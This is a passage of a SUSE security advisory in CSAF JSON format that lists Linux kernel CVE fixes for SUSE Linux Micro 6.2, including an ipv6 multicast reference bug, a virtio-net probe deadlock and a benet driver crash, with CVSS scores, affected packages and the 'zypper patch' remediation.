"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38548"
},
{
"cve": "CVE-2025-38550",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38550"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: mcast: Delay put pmc-\u003eidev in mld_del_delrec()\n\npmc-\u003eidev is still used in ip6_mc_clear_src(), so as mld_clear_delrec()\ndoes, the reference should be put after ip6_mc_clear_src() return.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38550",
"url": "https://www.suse.com/security/cve/CVE-2025-38550"
},
{
"category": "external",
"summary": "SUSE Bug 1248227 for CVE-2025-38550",
"url": "https://bugzilla.suse.com/1248227"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38550"
},
{
"cve": "CVE-2025-38551",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38551"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvirtio-net: fix recursived rtnl_lock() during probe()\n\nThe deadlock appears in a stack trace like:\n\n virtnet_probe()\n rtnl_lock()\n virtio_config_changed_work()\n netdev_notify_peers()\n rtnl_lock()\n\nIt happens if the VMM sends a VIRTIO_NET_S_ANNOUNCE request while the\nvirtio-net driver is still probing.\n\nThe config_work in probe() will get scheduled until virtnet_open() enables\nthe config change notification via virtio_config_driver_enable().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38551",
"url": "https://www.suse.com/security/cve/CVE-2025-38551"
},
{
"category": "external",
"summary": "SUSE Bug 1248234 for CVE-2025-38551",
"url": "https://bugzilla.suse.com/1248234"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38551"
},
{
"cve": "CVE-2025-38569",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38569"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbenet: fix BUG when creating VFs\n\nbenet crashes as soon as SRIOV VFs are created:\n\n kernel BUG at mm/vmalloc.c:3457!\n Oops: invalid opcode: 0000 [#1] SMP KASAN NOPTI\n CPU: 4 UID: 0 PID: 7408 Comm: test.sh Kdump: loaded Not tainted 6.16.0+ #1 PREEMPT(voluntary)\n [...]\n RIP: 0010:vunmap+0x5f/0x70\n [...]\n Call Trace:\n \u003cTASK\u003e\n __iommu_dma_free+0xe8/0x1c0\n be_cmd_set_mac_list+0x3fe/0x640 [be2net]\n be_cmd_set_mac+0xaf/0x110 [be2net]\n be_vf_eth_addr_config+0x19f/0x330 [be2net]\n be_vf_setup+0x4f7/0x990 [be2net]\n be_pci_sriov_configure+0x3a1/0x470 [be2net]\n sriov_numvfs_store+0x20b/0x380\n kernfs_fop_write_iter+0x354/0x530\n vfs_write+0x9b9/0xf60\n ksys_write+0xf3/0x1d0\n do_syscall_64+0x8c/0x3d0\n\nbe_cmd_set_mac_list() calls dma_free_coherent() under a spin_lock_bh.\nFix it by freeing only after the lock has been released.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38569",
"url": "https://www.suse.com/security/cve/CVE-2025-38569"
},
{
"category": "external",
"summary": "SUSE Bug 1248384 for CVE-2025-38569",
"url": "https://bugzilla.suse.com/1248384"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
